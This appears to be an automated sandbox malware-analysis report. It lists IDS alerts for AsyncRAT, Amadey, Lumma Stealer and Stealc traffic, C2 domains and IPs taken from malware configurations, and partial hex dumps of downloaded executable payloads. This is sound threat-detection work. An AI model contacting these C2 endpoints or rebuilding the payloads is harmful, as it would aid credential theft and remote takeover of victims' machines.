Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49869
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49872
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49870
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49871
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49868 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49879
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49878
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49881 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49882
Source: Network traffic	Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 205.209.109.10:4449 -> 192.168.2.5:49890
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49906 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49912 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49933 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49935 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49938 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49927 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49920 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49948 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49950 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49984 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49988 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49994 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49987 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50007 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50014 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50020 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50028 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50095 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:50093 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50096 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49881 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49881 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49867 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49867 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49948 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49948 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49935 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49935 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49912 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50093 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50093 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50095 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50095 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49994 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: unknown

Network traffic detected: DNS query count 37

Source: global traffic

TCP traffic: 192.168.2.5:49856 -> 205.209.109.10:4449

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 10:11:09 GMTContent-Type: application/octet-streamContent-Length: 1765888Last-Modified: Tue, 10 Dec 2024 09:46:58 GMTConnection: keep-aliveETag: "67580e12-1af200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d4 1d e4 63 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 16 01 00 00 08 00 00 00 00 00 00 00 e0 45 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 46 00 00 04 00 00 25 99 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 60 01 00 69 00 00 00 00 40 01 00 c8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 01 00 00 20 00 00 00 88 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 c8 04 00 00 00 40 01 00 00 06 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 60 01 00 00 02 00 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 80 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 7a 79 69 6d 69 6b 6b 00 20 1a 00 00 a0 2b 00 00 18 1a 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 67 64 69 72 66 76 61 00 20 00 00 00 c0 45 00 00 06 00 00 00 ca 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 45 00 00 22 00 00 00 d0 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 10:11:17 GMTContent-Type: application/octet-streamContent-Length: 1839104Last-Modified: Tue, 10 Dec 2024 09:49:16 GMTConnection: keep-aliveETag: "67580e9c-1c1000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 b0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 48 00 00 04 00 00 a9 cb 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 72 6f 79 78 70 63 64 00 90 19 00 00 10 2f 00 00 90 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 68 68 6c 74 66 74 6b 00 10 00 00 00 a0 48 00 00 04 00 00 00 ea 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 48 00 00 22 00 00 00 ee 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 10:11:25 GMTContent-Type: application/octet-streamContent-Length: 1780224Last-Modified: Tue, 10 Dec 2024 09:49:22 GMTConnection: keep-aliveETag: "67580ea2-1b2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 50 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 68 00 00 04 00 00 07 d9 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 61 7a 75 7a 71 66 77 00 90 19 00 00 b0 4e 00 00 86 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 65 78 71 70 76 65 62 00 10 00 00 00 40 68 00 00 04 00 00 00 04 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 68 00 00 22 00 00 00 08 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 10:11:35 GMTContent-Type: application/octet-streamContent-Length: 968192Last-Modified: Tue, 10 Dec 2024 09:47:33 GMTConnection: keep-aliveETag: "67580e35-ec600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2d 0e 58 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 a7 cc 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 e4 5a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e4 5a 01 00 00 40 0d 00 00 5c 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 50 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 10:11:43 GMTContent-Type: application/octet-streamContent-Length: 2845184Last-Modified: Tue, 10 Dec 2024 09:47:58 GMTConnection: keep-aliveETag: "67580e4e-2b6a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 54 fa 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 64 6f 73 74 6c 70 6b 00 20 2b 00 00 a0 00 00 00 08 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 75 70 65 6f 79 71 00 20 00 00 00 c0 2b 00 00 06 00 00 00 42 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2b 00 00 22 00 00 00 48 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
